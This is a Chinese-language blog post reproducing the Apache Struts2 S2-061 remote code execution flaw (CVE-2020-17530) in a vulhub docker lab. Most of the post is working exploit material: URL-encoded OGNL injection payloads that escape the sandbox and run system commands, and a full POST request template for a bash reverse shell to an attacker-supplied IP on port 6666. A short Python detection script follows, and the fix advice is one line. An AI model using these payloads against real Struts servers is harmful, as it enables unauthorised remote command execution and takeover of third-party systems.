Struts2 S2-061 远程命令执行漏洞(CVE-2020-17530)复现
目录漏洞简介影响版本漏洞复现docker-compose文件搭建漏洞环境漏洞测试修复建议漏洞检测poc漏洞简介Apache Struts2框架是一个用于开发Java EE网络应用程序的Web框架。Apache Struts于2020年12月08日披露 S2-061 Struts 远程代码执行漏洞(CVE-2020-17530),在使用某些tag等情况下可能存在OGNL表达式注入漏洞,从而造成远程代
目录
漏洞简介
Apache Struts2框架是一个用于开发Java EE网络应用程序的Web框架。Apache Struts于2020年12月08日披露 S2-061 Struts 远程代码执行漏洞(CVE-2020-17530),在使用某些tag等情况下可能存在OGNL表达式注入漏洞,从而造成远程代码执行,风险极大。
影响版本
- Apache Struts 2.0.0 - 2.5.25
漏洞复现
docker-compose文件搭建漏洞环境
这里搭建Apache Struts 2.5.25的环境
docker-compose.yml文件内容如下
version: '2'
services:
struts2:
image: vulhub/struts2:2.5.25
ports:
- "8080:8080"
执行docker-compose up -d 启动环境
访问8080端口
漏洞测试
1. 验证漏洞是否存在
xx:8080/?id=%25%7b+%27test%27+%2b+(2021+%2b+20).toString()%7d
发现执行了 2021+20的命令
2. 执行系统命令id
:8080/?id=%25{(%27Powered_by_Unicode_Potats0%2cenjoy_it%27).(%23UnicodeSec+%3d+%23application[%27org.apache.tomcat.InstanceManager%27]).(%23potats0%3d%23UnicodeSec.newInstance(%27org.apache.commons.collections.BeanMap%27)).(%23stackvalue%3d%23attr[%27struts.valueStack%27]).(%23potats0.setBean(%23stackvalue)).(%23context%3d%23potats0.get(%27context%27)).(%23potats0.setBean(%23context)).(%23sm%3d%23potats0.get(%27memberAccess%27)).(%23emptySet%3d%23UnicodeSec.newInstance(%27java.util.HashSet%27)).(%23potats0.setBean(%23sm)).(%23potats0.put(%27excludedClasses%27%2c%23emptySet)).(%23potats0.put(%27excludedPackageNames%27%2c%23emptySet)).(%23exec%3d%23UnicodeSec.newInstance(%27freemarker.template.utility.Execute%27)).(%23cmd%3d{%27id%27}).(%23res%3d%23exec.exec(%23cmd))}
3. 反弹shell
反弹shell的命令,需将命令先做一个编码的转换 ,网址:http://www.jackson-t.ca/runtime-exec-payloads.html
bash -i >& /dev/tcp/xx.xx.xx.xx/6666 0>&1
将命令填入下面的xxxxxxx中,进行发送
POST /index.action HTTP/1.1
Host: 192.168.1.5:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryl7d1B1aGsV2wcZwF
Content-Length: 922
------WebKitFormBoundaryl7d1B1aGsV2wcZwF
Content-Disposition: form-data; name="id"
%{(#instancemanager=#application["org.apache.tomcat.InstanceManager"]).(#stack=#attr["com.opensymphony.xwork2.util.ValueStack.ValueStack"]).(#bean=#instancemanager.newInstance("org.apache.commons.collections.BeanMap")).(#bean.setBean(#stack)).(#context=#bean.get("context")).(#bean.setBean(#context)).(#macc=#bean.get("memberAccess")).(#bean.setBean(#macc)).(#emptyset=#instancemanager.newInstance("java.util.HashSet")).(#bean.put("excludedClasses",#emptyset)).(#bean.put("excludedPackageNames",#emptyset)).(#arglist=#instancemanager.newInstance("java.util.ArrayList")).(#arglist.add("xxxxxxxxxxxxxxxxxxxxx")).(#execute=#instancemanager.newInstance("freemarker.template.utility.Execute")).(#execute.exec(#arglist))}
------WebKitFormBoundaryl7d1B1aGsV2wcZwF--
修复建议
升级至最新版
漏洞检测poc
import requests
import argparse
import os
def url():
parser = argparse.ArgumentParser(description='Struts2 S2-061 远程命令执行漏洞(CVE-2020-17530)POC')
parser.add_argument('target_url',type=str,help='The target address,example: http://192.168.140.153:8848')
args = parser.parse_args()
global url
url = args.target_url
#检测输入的url的正确性
if url.startswith('http://') or url.startswith('https://'):
pass
else:
print('[-]Please include http:// or https:// in the URL!!')
os._exit(0)
if url.endswith('/'):
url = url[:-1]
print('[+]author:chenchen')
print("[-]Struts2 S2-061 远程命令执行漏洞(CVE-2020-17530)POC",)
print("[-]开始执行检测...")
print("[-]目标地址:",url)
return url
def poc():
headers={
'User-Agent':'Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.75 Mobile Safari/537.36'
}
vul_url = url + '/?id=%25%7b+%27test%27+%2b+(2021+%2b+20).toString()%7d'
try:
text = requests.get(vul_url,headers=headers,timeout=10).text
if '2041' in text:
print('[+]漏洞存在')
else:
print('[-]漏洞不存在')
except:
print('[-]发生错误')
if __name__ == '__main__':
url()
poc()——心若没有栖息的地方,到哪都是流浪
权威|前沿|技术|干货|国内首个API全生命周期开发者社区
更多推荐
4
0- 0
已为社区贡献10条内容
所有评论(0)